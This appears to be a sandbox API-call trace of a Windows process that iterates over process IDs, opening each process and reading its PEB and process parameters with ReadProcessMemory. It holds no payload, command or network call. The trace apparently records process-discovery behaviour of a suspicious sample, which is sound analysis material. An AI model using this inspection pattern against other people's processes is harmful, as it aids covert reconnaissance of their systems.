[0412.234] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.235] malloc (_Size=0x88) returned 0x2e3b00
[0412.235] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b277c, lpBuffer=0x2e3b00, nSize=0x86, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b00*, lpNumberOfBytesRead=0x0) returned 1
[0412.235] free (_Block=0x2e3b00)
[0412.236] CloseHandle (hObject=0x24c) returned 1
[0412.237] _ui64tow (_Value=0x9b0, _Buffer="2472", _Radix=10) returned="2480"
[0412.241] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2480") returned 4
[0412.244] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.244] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x24c
[0412.328] GetLastError () returned 0x0
[0412.328] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a26f2, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.331] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.332] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.332] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.332] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.333] malloc (_Size=0x76) returned 0x2c1300
[0412.333] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a2760, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.333] free (_Block=0x2c1300)
[0412.334] CloseHandle (hObject=0x24c) returned 1
[0412.335] _ui64tow (_Value=0x9b8, _Buffer="2480", _Radix=10) returned="2488"
[0412.339] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2488") returned 4
[0412.343] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.343] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.375] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x24c
[0412.375] GetLastError () returned 0x0
[0412.376] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.376] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a26f0, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.377] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.378] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.379] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.379] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.379] malloc (_Size=0x76) returned 0x2c1300
[0412.379] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4a275e, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.379] free (_Block=0x2c1300)
[0412.380] CloseHandle (hObject=0x24c) returned 1
[0412.381] _ui64tow (_Value=0x9dc, _Buffer="2488", _Radix=10) returned="2524"
[0412.385] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2524") returned 4
[0412.386] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.386] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.410] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x24c
[0412.410] GetLastError () returned 0x0
[0412.410] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.410] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.410] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.411] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.411] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b26e8, lpBuffer=0x12dd100, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.412] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.413] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.413] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.415] malloc (_Size=0x76) returned 0x2c1300
[0412.415] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3b2756, lpBuffer=0x2c1300, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.415] free (_Block=0x2c1300)
[0412.416] CloseHandle (hObject=0x24c) returned 1
[0412.417] _ui64tow (_Value=0x9e8, _Buffer="2524", _Radix=10) returned="2536"
[0412.421] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2536") returned 4
[0412.422] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.422] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.443] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x24c
[0412.443] GetLastError () returned 0x0
[0412.444] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622940, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.444] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x6226f2, lpBuffer=0x12dd100, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.449] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.450] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x621ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.451] malloc (_Size=0x78) returned 0x2c1300
[0412.451] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x622762, lpBuffer=0x2c1300, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0412.451] free (_Block=0x2c1300)
[0412.452] CloseHandle (hObject=0x24c) returned 1
[0412.453] _ui64tow (_Value=0x9f4, _Buffer="2536", _Radix=10) returned="2548"
[0412.457] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2548") returned 4
[0412.459] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.459] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.482] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f4) returned 0x24c
[0412.482] GetLastError () returned 0x0
[0412.482] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x462910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.483] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.484] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.485] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.485] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.486] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.486] malloc (_Size=0x6e) returned 0x2c1680
[0412.486] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x46274c, lpBuffer=0x2c1680, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0412.486] free (_Block=0x2c1680)
[0412.487] CloseHandle (hObject=0x24c) returned 1
[0412.487] _ui64tow (_Value=0xa00, _Buffer="2548", _Radix=10) returned="2560"
[0412.492] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2560") returned 4
[0412.494] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.494] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.515] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa00) returned 0x24c
[0412.515] GetLastError () returned 0x0
[0412.515] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.515] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.516] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e26fc, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.517] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.518] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.518] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.519] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.519] malloc (_Size=0x7c) returned 0x2e3b90
[0412.519] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2770, lpBuffer=0x2e3b90, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b90*, lpNumberOfBytesRead=0x0) returned 1
[0412.519] free (_Block=0x2e3b90)
[0412.520] CloseHandle (hObject=0x24c) returned 1
[0412.521] _ui64tow (_Value=0xa0c, _Buffer="2560", _Radix=10) returned="2572"
[0412.526] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2572") returned 4
[0412.527] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.527] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.550] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x24c
[0412.550] GetLastError () returned 0x0
[0412.550] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.550] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.551] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.551] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.551] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b26ea, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.552] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.553] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.553] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.553] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.557] malloc (_Size=0x7a) returned 0x2e3a70
[0412.557] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x1b275c, lpBuffer=0x2e3a70, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0412.557] free (_Block=0x2e3a70)
[0412.558] CloseHandle (hObject=0x24c) returned 1
[0412.559] _ui64tow (_Value=0xa18, _Buffer="2572", _Radix=10) returned="2584"
[0412.563] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2584") returned 4
[0412.564] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.565] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.589] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x24c
[0412.589] GetLastError () returned 0x0
[0412.590] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x462920, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.590] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4626e6, lpBuffer=0x12dd100, nSize=0x6a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.591] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.592] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.592] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.592] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x461ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
